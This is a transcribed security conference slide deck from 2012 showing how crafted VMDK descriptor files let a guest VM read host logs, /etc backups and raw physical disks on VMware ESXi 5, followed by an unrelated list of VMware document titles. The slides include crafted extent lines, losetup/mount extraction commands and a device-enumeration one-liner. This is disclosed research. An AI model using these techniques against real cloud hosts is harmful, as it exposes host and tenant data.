VMDK Has Left the Building
|
|
|
- Adelia Allen
- 10 years ago
- Views:
Transcription
1 VMDK Has Left the Building Attacking Cloud Infrastructures by Malicious VMDK Files Matthias Luft, Daniel Mende, Enno Rey, Pascal Turbing
2 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #2# Who we are Old-school network geeks, working as security researchers for Germany based ERNW GmbH Independent Deep technical knowledge Structured (assessment) approach Business reasonable recommendations We understand corporate Blog: Conference:
3 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #3# Agenda Intro & Technical Overview Attack Vectors Conclusions
4 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #4# How to Attack a (IaaS) Cloud Service? Management APIs / Interfaces Or: Which Interfaces Does it Offer? veroeffentlichungen/2011/10/22/ AmazonSignatureWrapping.pdf From the runtime environment Think: Guest! host attack E.g. look at all the nice attack vectors in VMSA with that ridiculous recommendation Do not allow untrusted users access to your virtual machines. ;-) On the filesystem level, e.g. by (virtual) image/ hard disk upload.
5 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #5# This Is What This Workshop Is About Attacking Virtual Hard Disks With a special focus on VMDK files. In particular in VMware vsphere 5 environments. There s a breeze of 0-day here ;-)
6 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #6# Virtual File Formats Short Overview There s a whole bunch of virtual file formats Relevant Fact: Distinction in Virtual machine configuration Virtual disk files
7 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #7# Common Files in VMware World At least the most important ones as for this talk. VMX: virtual machine Plain-text configuration/description #!/opt/vmware/server/bin/vmware.encoding = "UTF-8" config.version = "8" virtualhw.version = "4" scsi0.present = "TRUE" memsize = "1512"
8 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #8# Common Files in VMware World At least the most important ones as for this talk. VMDK: virtual disk, consisting of two file types: Descriptor file: # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 [ ] # Extent description RW VMFS "machine-flat01.vmdk The actual disk files containing raw disk data (MBR, partition table, file system, content...)
9 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #9# Cloud Deployment Kudos to Juan Mayer
10 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #10# How Cloud Deployment Works ESXi 5 Host Backend Storage (e.g. SAN) 1) Upload to storage by web interface, FTP, Hypervisor Hypervisor Local HD
11 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #11# How Cloud Deployment Works ESXi 5 Host Backend Storage (e.g. SAN) Hypervisor 2) Copy to Host Hypervisor Local HD
12 How Cloud Deployment Works ESXi 5 Host Backend Storage (e.g. SAN) Hypervisor Hypervisor Local HD 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg 3) Cloud Magic! #12#
13 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #13# Sample of Cloud Providers Allowing to Upload VMDKs! We ve not performed any practical testing. Yet. Provider Upload via Upload Validation Further Details & How To s terremark.com Web-Tool Ovf validation, vmdk validation information in ov default.asp?id=971&lang=1 lunahost.com Web-Tool Not specified FAQsandHowTos.aspx Cloudshare.com Ftp-client Ovf validation recommended but not required Hosting.com Online FTP manager None common/vm%20_upload_instructions.pdf
14 Lab Setup c) Start VM via SSH/CLI b) Start VM via API Copy#malicious#VM#to# backend#storage# a) Start VM via vcenter Fully patched environment as of 05/24/ /25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #14#
15 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #15# Let s Start Playing Potential Attack Paths Fuzzing File Inclusion Stuff
16 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #16# VMDK Fuzzing
17 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #17# Disk metadata Textbased harddrive description file. # Disk DescriptorFile version=1 encoding="utf-8" Links to real data files (extents). # Extent description RW VMFS "ts_2vmdk-flat.vmdk Also holds disk physical dimensions. ddb.geometry.cylinders = "40" ddb.geometry.heads = "16"
18 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #18# vmdk file fuzzing name = "vmdkfile" objects = [ field("version_str", None, "version=", none), field("version", None, "1", std), field("version_br", None, "\n", none), [...] field("encoding_str", None, "encoding=", none), field("encoding", None, '"UTF-8"', std), field("encoding_br", None, "\n", none), field("cid_str", None, "CID=", none), field("cid", None, "c74bb4e1", std), field("cid_br", None, "\n", none), field("pcid_str", None, "parentcid=", none), field("pcid", None, "ffffffff", std), field("pcid_br", None, "\n", none),
19 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #19# Results From the logs: DiskLib_Check() failed for source disk (15) VMX has left the building: 0
20 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #20# The Beef Yummy Data Different Binary data formats Flat files Growing files Sparse files Flat files got no header, they re just virtual disks plain data. Growing and sparse files got a header structure, which makes an excellent target.
21 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #21# Sparse Extent Header Fuzzing name = "ESXi Host Sparse Extend Header - root" objects = [ field("magicnumber", 32, "COWD", none), field("version", 32, "\x00\x00\x00\x01", std), field("flags", 32, "\x00\x00\x00\x03", std), field("numsectors", 32, "\x00\x00\x00\xff", std), field("grainsize", 32, "\x00\x00\x00\x01", std), field("gdoffset", 32, "\x00\x00\x00\x04", std), field("numgdentries", 32, "\x00\x00\x00\x04", std), field("freesector", 32, "\x00\x00\x00\x08", std), #root [...]
22 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #22# Some Code Will be found on soon.
23 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #23# File Inclusion
24 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #24# File Inclusion Back to that Descriptor File # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 parentcid=ffffffff isnativesnapshot="no" createtype="vmfs" # Extent description RW VMFS "machine-flat01.vmdk
25 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #25# File Inclusion Back to that Descriptor File # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 parentcid=ffffffff isnativesnapshot="no" createtype="vmfs" # Extent description RW VMFS "machine-flat01.vmdk RW 0 VMFS /etc/passwd
26 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #26# Inclusion First Try The classic: /etc/passwd RW VMFS "machine-flat01.vmdk RW 0 VMFS "/etc/passwd Didn t work ;-)
27 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #27# Inclusion First Try
28 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #28# First Blood Logfile Inclusion
29 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #29# Inclusion of Logs Extend your disk by any gzipped logfile in /scratch/log # Extent description RW VMFS "machine-flat.vmdk RW 0 VMFS "/scratch/log/vmkernel.0.gz"
30 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #30# Inclusion of Logs Boot up the virtual machine Define the included section of your hard drive $ losetup o $( * 512 ) f /dev/sda Extract data $ zcat /dev/loop0 > extracted_logfile
31 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #31# Demo? Yes, please. # DEMO%
32 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #32# File Inclusion Just to Make this Clear This is a GUEST machine accessing the logfiles of the ESX HOST!
33 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #33# File Inclusion Part 2 Logs are a nice first step! Let s go through some more log files...
34 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #34# Interesting log file /bootbank/state.tgz # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 [ ] # Extent description RW VMFS "machine-flat01.vmdk RW 0 VMFS /bootbank/state.tgz! Contains complete backup of /etc!
35 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #35# File Inclusion Just to Make this Clear This is a GUEST machine accessing /etc/ of the ESX HOST!
36 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #36# File Inclusion Part 3 Logfiles, /etc... on the right way. What else can we do? Hard drives/devices in *nix are files, right?! Try to include physical host disks in a guest machine!
37 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #37# Device Inclusion Part 3 Device names on ESXi
38 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #38# Device Inclusion Part 3 Relying on knowledge gathered on the hypervisor! # Disk DescriptorFile version=1 encoding="utf-8" CID=a5c61889 [ ] # Extent description RW VMFS "machine-flat01.vmdk RW VMFSRAW "/dev/disks/naa b1001ca97740cc c136:2"
39 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #39# Device Inclusion Include a partition of an enumerated device as follows: # Extent description RW VMFS machine-flat.vmdk RW VMFSRAW "/dev/disks/naa b1001ca97740cc c136:2 The :2 indicates the partition number, e.g. similar to /dev/sda2 in linux
40 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #40# Device Inclusion Once you made your loop device with the appropriate offset, your are actually able to mount the partition root@attx:~# losetup -v -o f /dev/sda Loop device is /dev/loop0 root@attx:~# mount /dev/loop0 /mnt/ root@attx:~# ls /mnt/ core downloads log var
41 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #41# Demo? Yes, please. # DEMO%
42 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #42# Device Inclusion Just to Make this Clear This is a GUEST machine accessing a physical harddrive of the ESX HOST!
43 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #43# Complete Attack Path In Cloud Environments
44 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #44# Prerequisites For Complete Attack Path Files must be on vmfs partition must be writable (for hostd?) must be unlocked, e.g. not reserved by running Vmware ESXi5 hypervisor in use Deployment of externally provided VMDK files is possible Deployment using the VMware API without further sanitization/input validation/vmdk rewriting.
45 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #45# Attack Path Deploy a virtual machine referencing /scratch/log/hostd.0.gz Access the included /scratch/log/ hostd.0.gz within the guest system and grep for ESXi5 device names Deploy another virtual machine referencing the extracted device names! Enjoy access to all physical hard drives of the hypervisor ;-)
46 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #46# Attack Path Deploy a virtual machine referencing /scratch/log/hostd.0.gz Access the included /scratch/log/ hostd.0.gz within the guest system and grep for ESXi5 device names Deploy another virtual machine referencing the extracted device names! Enjoy access to all physical hard drives of the hypervisor ;-)
47 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #47# Device Enumeration By iterating through logfiles like filename.x.gz one may collect a huge amount of information Looking for Devicenames: $ egrep -o "\w{3,}\.[0-9a-f]{32} deviceenum/hostd.log sort uniq naa b1001ca97740cc c136 naa.600c0ff000109e5b naa.600c0ff000109e5b52d3104f naa.600c0ff000109e5b8ee84d4f naa.600c0ff000109e5b968c4f4f naa.600c0ff000134edc
48 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #48# Device Inclusion Just to Make this Clear This is a GUEST machine accessing physical harddrive of the ESX HOST without additional knowledge!
49 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #49# There s even more stuff Coming Soon To A Cloud Near You... Hypervisor Denial of Service? Not to be discussed in this workshop due to time constraints.
50 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #50# But It s Certainly Doable ;-)
51 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #51# Conclusions Virtual hard disk integration offers yet-another-interface for attack exposure. In particular in Vmware vsphere 5 space. Appropriate trust relationships and/or careful sanitizing needed.
52 5/25/2012 ERNW GmbH Carl-Bosch-Str. 4 D Heidelberg #52# There s never enough time THANK%YOU %...for%yours!%
From Hypervisors to Clouds
From Hypervisors to Clouds or: How Traditional Security Controls Fail Matthias Luft [email protected] Who we are Old-school network geeks, working as security researchers for Germany based ERNW GmbH - Independent
ESX System Analyzer Version 1.0 Installation Guide
ESX System Analyzer Version 1.0 Installation Guide Page 1 Table of Contents ESX System Analyzer Installation Guide 1. Installing ESX System Analyzer... 3 ESX System Analyzer Appliance Distribution... 3
VMware vsphere-6.0 Administration Training
VMware vsphere-6.0 Administration Training Course Course Duration : 20 Days Class Duration : 3 hours per day (Including LAB Practical) Classroom Fee = 20,000 INR Online / Fast-Track Fee = 25,000 INR Fast
BLACK BOX. Quick Start Guide. Virtual Central Management System (VCMS) Works with LES Series Console Servers. LES-VCMS. Customer Support Information
LES-VCMS Virtual Central Management System (VCMS) Quick Start Guide Works with LES Series Console Servers. BLACK BOX Customer Support Information Order toll-free in the U.S.: Call 877-877-BBOX (outside
Enterprise Cloud VM Image Import User Guide. Version 1.0
Enterprise Cloud VM Image Import User Guide Version 1.0 Version History Issue Date Comments 1.0 2013/03/20 Initial version i Introduction 1) Purpose of this document: The purpose of this document is to
Compromise-as-a-Service
ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg 3/31/14 Compromise-as-a-Service Our PleAZURE Felix Wilhelm & Matthias Luft {fwilhelm, mluft}@ernw.de ERNW GmbH Carl-Bosch-Str. 4 D-69115 Heidelberg Agenda
JOB ORIENTED VMWARE TRAINING INSTITUTE IN CHENNAI
JOB ORIENTED VMWARE TRAINING INSTITUTE IN CHENNAI Job oriented VMWARE training is offered by Peridot Systems in Chennai. Training in our institute gives you strong foundation on cloud computing by incrementing
Drobo How-To Guide. Cloud Storage Using Amazon Storage Gateway with Drobo iscsi SAN
The Amazon Web Services (AWS) Storage Gateway uses an on-premises virtual appliance to replicate a portion of your local Drobo iscsi SAN (Drobo B1200i, left below, and Drobo B800i, right below) to cloudbased
Oracle VM Server Recovery Guide. Version 8.2
Oracle VM Server Recovery Guide Version 8.2 Oracle VM Server for x86 Recovery Guide The purpose of this document is to provide the steps necessary to perform system recovery of an Oracle VM Server for
How To Image A Single Vm For Forensic Analysis On Vmwarehouse.Com
MCP+I, MCSE, CCSA, CCSE, CISSP-ISSAP, CISM, CISA, CIFI, CCE, ACE, GCFE, GCFA, GSEC, VCP4/5, vexpert Senior SANS Instructor - [email protected] 1 A Lot To Cover In ½ An Hour We simply can not cover all cloud
So happy to be here! Paparazzi over IP. Daniel Mende & Pascal Turbing {dmende pturbing}@ernw.de. www.ernw.de
So happy to be here! Paparazzi over IP Daniel Mende & Pascal Turbing {dmende pturbing}@ernw.de 2/18/2013 ERNW GmbH Carl-Bosch-Str. 4 DE-69115 Heidelberg #2 Who we are Old-school network geeks, working
PassTest. Bessere Qualität, bessere Dienstleistungen!
PassTest Bessere Qualität, bessere Dienstleistungen! Q&A Exam : VCP510 Title : VMware Certified Professional on VSphere 5 Version : Demo 1 / 7 1.Which VMware solution uses the security of a vsphere implementation
Acronis Backup & Recovery 10 Advanced Server Virtual Edition. Quick Start Guide
Acronis Backup & Recovery 10 Advanced Server Virtual Edition Quick Start Guide Table of contents 1 Main components...3 2 License server...3 3 Supported operating systems...3 3.1 Agents... 3 3.2 License
VMware Data Recovery. Administrator's Guide EN-000193-00
Administrator's Guide EN-000193-00 You can find the most up-to-date technical documentation on the VMware Web site at: http://www.vmware.com/support/ The VMware Web site also provides the latest product
Installing and Administering VMware vsphere Update Manager
Installing and Administering VMware vsphere Update Manager Update 1 vsphere Update Manager 5.1 This document supports the version of each product listed and supports all subsequent versions until the document
VMware vsphere 5.0 Boot Camp
VMware vsphere 5.0 Boot Camp This powerful 5-day 10hr/day class is an intensive introduction to VMware vsphere 5.0 including VMware ESX 5.0 and vcenter. Assuming no prior virtualization experience, this
Reader s Choice Preferred product
PHD Virtual Technologies Reader s Choice Preferred product Sample Customer by Vertical Financial & Services Retail, Manufacturing & Healthcare Technology & Electronics Government Education Managed Service
Top 10 Do s/don ts of Data Protection for VMware vsphere
September 8, 2014 Top 10 Do s/don ts of Data Protection for VMware vsphere Dominic Cheah Technical Marketing Engineer Agenda Exploring Data Protection for VMware vsphere vsphere Snapshots, Cloning, and
VMware@SoftLayer Cookbook Backup, Recovery, Archival (BURA)
VMware@SoftLayer Cookbook Backup, Recovery, Archival (BURA) IBM Global Technology Services: Khoa Huynh ([email protected]) Daniel De Araujo ([email protected]) Bob Kellenberger ([email protected]) 1
VMware vsphere VMFS-5 Upgrade Considerations
VMware vsphere VMFS-5 Upgrade Considerations TECHNICAL MARKETING DOCUMENTATION v 1.0/Updated Dec 2011 Table of Contents Introduction... 3 VMFS 5 Enhancements.... 4 New Unified 1MB File Block Size.... 4
VMware vsphere 5.1 Advanced Administration
Course ID VMW200 VMware vsphere 5.1 Advanced Administration Course Description This powerful 5-day 10hr/day class is an intensive introduction to VMware vsphere 5.0 including VMware ESX 5.0 and vcenter.
Virtual Server Agent v9 with VMware. March 2011
Virtual Server Agent v9 with VMware March 2011 Contents Summary... 3 Backup Transport Methods... 3 Deployment Scenarios... 3 VSA Installation Requirements... 4 VSA Patch Requirements... 4 VDDK Installation...
Protecting Virtual Endpoints with McAfee Server Security Suite Essentials
Sponsored by McAfee Protecting Virtual Endpoints with McAfee Server Security Suite Essentials December 2013 A SANS Analyst Whitepaper Written by Dave Shackleford Capability Sets for Virtualization Security
Getting Started with OpenStack and VMware vsphere TECHNICAL MARKETING DOCUMENTATION V 0.1/DECEMBER 2013
Getting Started with OpenStack and VMware vsphere TECHNICAL MARKETING DOCUMENTATION V 0.1/DECEMBER 2013 Table of Contents Introduction.... 3 1.1 VMware vsphere.... 3 1.2 OpenStack.... 3 1.3 Using OpenStack
vsphere Data Protection 6.0 VDP 6.0
vsphere Data Protection 6.0 VDP 6.0 How to backup VMware environments? Daniel Olkowski EMC Data Protection and Availability Division Europe EAST 1 Goal of the meeting Where to use new vsphere Data Protection
TECHNICAL PAPER. Veeam Backup & Replication with Nimble Storage
TECHNICAL PAPER Veeam Backup & Replication with Nimble Storage Document Revision Date Revision Description (author) 11/26/2014 1. 0 Draft release (Bill Roth) 12/23/2014 1.1 Draft update (Bill Roth) 2/20/2015
VMware vsphere: Install, Configure, Manage [V5.0]
VMware vsphere: Install, Configure, Manage [V5.0] Gain hands-on experience using VMware ESXi 5.0 and vcenter Server 5.0. In this hands-on, VMware -authorized course based on ESXi 5.0 and vcenter Server
SAN Implementation Course SANIW; 3 Days, Instructor-led
SAN Implementation Course SANIW; 3 Days, Instructor-led Course Description In this workshop course, you learn how to connect Windows, vsphere, and Linux hosts via Fibre Channel (FC) and iscsi protocols
In order to upload a VM you need to have a VM image in one of the following formats:
What is VM Upload? 1. VM Upload allows you to import your own VM and add it to your environment running on CloudShare. This provides a convenient way to upload VMs and appliances which were already built.
Design Implement Troubleshoot. VMware Virtualisation Strategies Private/Public/Hybrid Cloud Computing. www.redwoodsolutions.
Design Implement Troubleshoot VMware Virtualisation Strategies Private/Public/Hybrid Cloud Computing www.redwoodsolutions.net @NakedCloudGuy vsphere 4.1 to 5.1 Upgrade Some tippity top tips... Reasons
Onboarding VMs to Cisco OpenStack Private Cloud
White Paper Onboarding VMs to Cisco OpenStack Private Cloud This white paper will explain the process for exporting existing virtual machines from either VMware vsphere or AWS EC2 into Cisco OpenStack
VMware for Bosch VMS. en Software Manual
VMware for Bosch VMS en Software Manual VMware for Bosch VMS Table of Contents en 3 Table of contents 1 Introduction 4 1.1 Restrictions 4 2 Overview 5 3 Installing and configuring ESXi server 6 3.1 Installing
13.1 Backup virtual machines running on VMware ESXi / ESX Server
13 Backup / Restore VMware Virtual Machines Tomahawk Pro This chapter describes how to backup and restore virtual machines running on VMware ESX, ESXi Server or VMware Server 2.0. 13.1 Backup virtual machines
ESX 4 Patch Management Guide ESX 4.0
ESX 4 Patch Management Guide ESX 4.0 This document supports the version of each product listed and supports all subsequent versions until the document is replaced by a new edition. To check for more recent
Veeam Backup & Replication. Version 7.0
Veeam Backup & Replication Version 7.0 January, 2014 2014 Veeam Software. All rights reserved. All trademarks are the property of their respective owners. No part of this publication may be reproduced,
Table of Contents. Online backup Manager User s Guide
Table of Contents Backup / Restore VMware Virtual Machines... Error! Bookmark not defined. Backup virtual machines running on VMware ESXi / ESX Server with VDDK / non VDDK... 2 Requirements and recommendations...
Cedric Rajendran VMware, Inc. Security Hardening vsphere 5.5
Cedric Rajendran VMware, Inc. Security Hardening vsphere 5.5 Agenda Security Hardening vsphere 5.5 ESXi Architectural Review ESXi Software Packaging The ESXi Firewall ESXi Local User Security Host Logs
Directions for VMware Ready Testing for Application Software
Directions for VMware Ready Testing for Application Software Introduction To be awarded the VMware ready logo for your product requires a modest amount of engineering work, assuming that the pre-requisites
Vmware Training. Introduction
Vmware Training Course: Vmware Training Duration: 25 Days (Regular) Mode of Training: Classroom (Instructor-Led) Virtualization has redefined the way IT resources are consumed and services are delivered.
Optimization, Business Continuity & Disaster Recovery in Virtual Environments. Darius Spaičys, Partner Business manager Baltic s 2012-06-14
Optimization, Business Continuity & Disaster Recovery in Virtual Environments Darius Spaičys, Partner Business manager Baltic s 2012-06-14 Agenda Business Continuity and Disaster Recovery Challenges How
How To Use Netbackup 7.5.0.2.2 (Vmware) On A Virtual Machine
Support for NetBackup 7.x in virtual environments Introduction This tech note (TECH127089) describes support for NetBackup in virtual environments. Symantec Corporation is committed to serving the virtualization
Migrating to ESXi: How To
ILTA Webinar Session Migrating to ESXi: How To Strategies, Procedures & Precautions Server Operations and Security Technology Speaker: Christopher Janoch December 29, 2010 Migrating to ESXi: How To Strategies,
VMware ESXi in a Cloud-based Lab David Davis, VCP, VCAP, and vexpert
VMware ESXi in a Cloud-based Lab David Davis, VCP, VCAP, and vexpert WHITE PAPER BROUGHT TO YOU BY SKYTAP 2 VMware ESXi in a Cloud-based Lab Contents Executive Summary... 3 1. Scenarios Enabled by ESXi
ClearPass Policy Manager 6.3
ClearPass Policy Manager 6.3 Tech Note: Installing or Upgrading on a Virtual Machine This document describes the procedures for installing and upgrading ClearPass Policy Manager 6.3 on a Virtual Machine.
Is VMware Data Recovery the replacement for VMware Consolidated Backup (VCB)? VMware Data Recovery is not the replacement product for VCB.
VMware Data Recovery Frequently Asked Questions (FAQ), June 2010 Product Overview What is VMware Data Recovery? VMware Data Recovery is a backup and recovery product for VMware vsphere 4.x environments
Barracuda Backup Vx. Virtual Appliance Deployment. White Paper
Barracuda Backup Vx Virtual Appliance Deployment White Paper DOCUMENT SCOPE This document provides guidance and best practices on designing and deploying Barracuda Backup Vx Virtual Appliance on VMware
[VADP OVERVIEW FOR NETBACKUP]
2013 Ram Nagalla [VADP OVERVIEW FOR NETBACKUP] Understanding the concept of VADP backup in Netbackup and brief description about the different configuration scenarios. Index 1) Overview. 2 2) Compatibility
Web Application Firewall
Web Application Firewall Getting Started Guide August 3, 2015 Copyright 2014-2015 by Qualys, Inc. All Rights Reserved. Qualys and the Qualys logo are registered trademarks of Qualys, Inc. All other trademarks
Enterprise. ESXi in the. VMware ESX and. Planning Deployment of. Virtualization Servers. Edward L. Haletky
VMware ESX and ESXi in the Enterprise Planning Deployment of Virtualization Servers Edward L. Haletky PRENTICE HALL Upper Saddle River, NJ Boston Indianapolis San Francisco New York Toronto Montreal London
Using SUSE Cloud to Orchestrate Multiple Hypervisors and Storage at ADP
Using SUSE Cloud to Orchestrate Multiple Hypervisors and Storage at ADP Agenda ADP Cloud Vision and Requirements Introduction to SUSE Cloud Overview Whats New VMWare intergration HyperV intergration ADP
Thinspace deskcloud. Quick Start Guide
Thinspace deskcloud Quick Start Guide Version 1.2 Published: SEP-2014 Updated: 16-SEP-2014 2014 Thinspace Technology Ltd. All rights reserved. The information contained in this document represents the
Bosch Video Management System High availability with VMware
Bosch Video Management System High availability with VMware en Technical Note Bosch Video Management System Table of contents en 3 Table of contents 1 Introduction 4 1.1 Restrictions 4 2 Overview 5 3
Data recovery Data management Electronic Evidence
Data recovery Data management Electronic Evidence 2 RAID, SAN and Virtual systems RAID, SAN and Virtual systems Data Loss Scenarios: RAID Recovery drive failure Deleted VM recovery Reinstall of ESX on
Capability VMware Hyper-V
Capability VMware Hyper-V Host File System Management Virtual Disk Image Format Integration Tools / Drivers Connect LUN directly to VM from SAN VMFS (Virtual Machine File System) VMware allows you to extend
Supply Chain (In-) Security
Supply Chain (In-) Security Graeme Neilson & Enno Rey Contact us: [email protected], [email protected] Graeme & Enno Graeme Neilson Security Consultant & Researcher Networking, Reverse engineering,
Khóa học dành cho các kỹ sư hệ thống, quản trị hệ thống, kỹ sư vận hành cho các hệ thống ảo hóa ESXi, ESX và vcenter Server
1. Mục tiêu khóa học. Khóa học sẽ tập trung vào việc cài đặt, cấu hình và quản trị VMware vsphere 5.1. Khóa học xây dựng trên nền VMware ESXi 5.1 và VMware vcenter Server 5.1. 2. Đối tượng. Khóa học dành
StarWind iscsi SAN Software Hands- On Review
StarWind iscsi SAN Software Hands- On Review Luca Dell'Oca April 2011 I ve always been fascinated by those software that let you transform a computer into a SAN appliance. The available uses of this kind
Virtualization. Michael Tsai 2015/06/08
Virtualization Michael Tsai 2015/06/08 What is virtualization? Let s first look at a video from VMware http://bcove.me/x9zhalcl Problems? Low utilization Different needs DNS DHCP Web mail 5% 5% 15% 8%
How to Backup and Restore a VM using Veeam
How to Backup and Restore a VM using Veeam Table of Contents Introduction... 3 Assumptions... 3 Add ESXi Server... 4 Backup a VM... 6 Restore Full VM... 12 Appendix A: Install Veeam Backup & Replication
Vembu VMBackup v3.1.0 BETA
Vembu VMBackup v3.1.0 BETA Release Notes With enhanced features and fixes boosting stability and performance, Vembu VMBackup v3.1.0 BETA is now available for user evaluation. The all in one Vembu VMBackup
Backup of ESXi Virtual Machines using Affa
Backup of ESXi Virtual Machines using Affa From SME Server Skill level: Advanced The instructions on this page may require deviations from procedure, a good understanding of linux and SME is recommended.
Virtual Volumes Technical Deep Dive
STO1965 Virtual Volumes Technical Deep Dive Rawlinson Rivera, VMware, Inc Suzy Visvanathan, VMware, Inc Disclaimer This presentation may contain product features that are currently under development. This
VMware vsphere Design. 2nd Edition
Brochure More information from http://www.researchandmarkets.com/reports/2330623/ VMware vsphere Design. 2nd Edition Description: Achieve the performance, scalability, and ROI your business needs What
FortiAnalyzer VM (VMware) Install Guide
FortiAnalyzer VM (VMware) Install Guide FortiAnalyzer VM (VMware) Install Guide December 05, 2014 05-520-203396-20141205 Copyright 2014 Fortinet, Inc. All rights reserved. Fortinet, FortiGate, FortiCare
Evaluating the Balabit Shell Control Box
Evaluating the Balabit Shell Control Box November 17, 2015 Copyright 1996-2015 Balabit SA Table of Contents 1. Evaluating Balabit Shell Control Box in a virtual environment... 3 1.1. Limitations... 3 1.2.
Virtual Computing and VMWare. Module 4
Virtual Computing and VMWare Module 4 Virtual Computing Cyber Defense program depends on virtual computing We will use it for hands-on learning Cyber defense competition will be hosted on a virtual computing
Why is a good idea to use OpenNebula in your VMware Infrastructure?
Why is a good idea to use OpenNebula in your VMware Infrastructure? Constantino Vázquez C12G Labs Online Webinar OpenNebula in your VMware Infrastructure Contents Introduction Overview: What is OpenNebula?
EMC Data Domain Management Center
EMC Data Domain Management Center Version 1.1 Initial Configuration Guide 302-000-071 REV 04 Copyright 2012-2015 EMC Corporation. All rights reserved. Published in USA. Published June, 2015 EMC believes
CA ARCserve Backup for Windows
CA ARCserve Backup for Windows Agent for Virtual Machines Guide r16 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as the Documentation
VMWARE COURSE OUTLINE. Revision 1.0 Prepared by: See CY
VMWARE COURSE OUTLINE Revision 1.0 Prepared by: See CY VMware Infrastructure Install, Configure & Manage v4 Course Part Number: VMware SKU: EDU-VS4ICM-OE Objective: To learn how to install, configure and
HP + Veeam: Fast VMware Recovery from SAN Snapshots
HP + Veeam: Fast VMware Recovery from SAN Snapshots Luca Dell Oca This tech brief was compiled from a series of articles written by virtualization consultant and architect Luca Dell Oca, a specialist in
vsphere & Hypervisor Editions
Reference Slides vsphere & Hypervisor Editions How are VMware ESXi and ESX different than VMware vsphere? VMware ESX and ESXi are two alternative architectures that customers can choose when deploying
TSM for Virtual Environments Data Protection for VMware
for Virtual Environments Data Protection for VMware Wolfgang Hitzler Technical Sales IBM Tivoli Storage Management [email protected] 2011 IBM Corporation Agenda Introduction for Virtual Environments 6.2
Virtual Appliance Setup Guide
The Virtual Appliance includes the same powerful technology and simple Web based user interface found on the Barracuda Web Application Firewall hardware appliance. It is designed for easy deployment on
TABLE OF CONTENTS. Administration Guide - Virtual Server idataagent (VMware) Page 1 of 176 OVERVIEW
Page 1 of 176 Administration Guide - Virtual Server idataagent (VMware) TABLE OF CONTENTS OVERVIEW Introduction Key Features Complete Virtual Machine Protection Granular Recovery of Virtual Machine Data
VM-Series Firewall Deployment Tech Note PAN-OS 5.0
VM-Series Firewall Deployment Tech Note PAN-OS 5.0 Revision A 2012, Palo Alto Networks, Inc. www.paloaltonetworks.com Contents Overview... 3 Supported Topologies... 3 Prerequisites... 4 Licensing... 5
VMware ESXi 3.5 update 2
VMware ESXi 3.5 update 2 VMware ESXi 3.5 Exec Summary What is it? What does it do? What is unique? Who can use it? How do you use it? Next generation, thin hypervisor for FREE Partitions servers to create
Install Guide for JunosV Wireless LAN Controller
The next-generation Juniper Networks JunosV Wireless LAN Controller is a virtual controller using a cloud-based architecture with physical access points. The current functionality of a physical controller
EXPLORING LINUX KERNEL: THE EASY WAY!
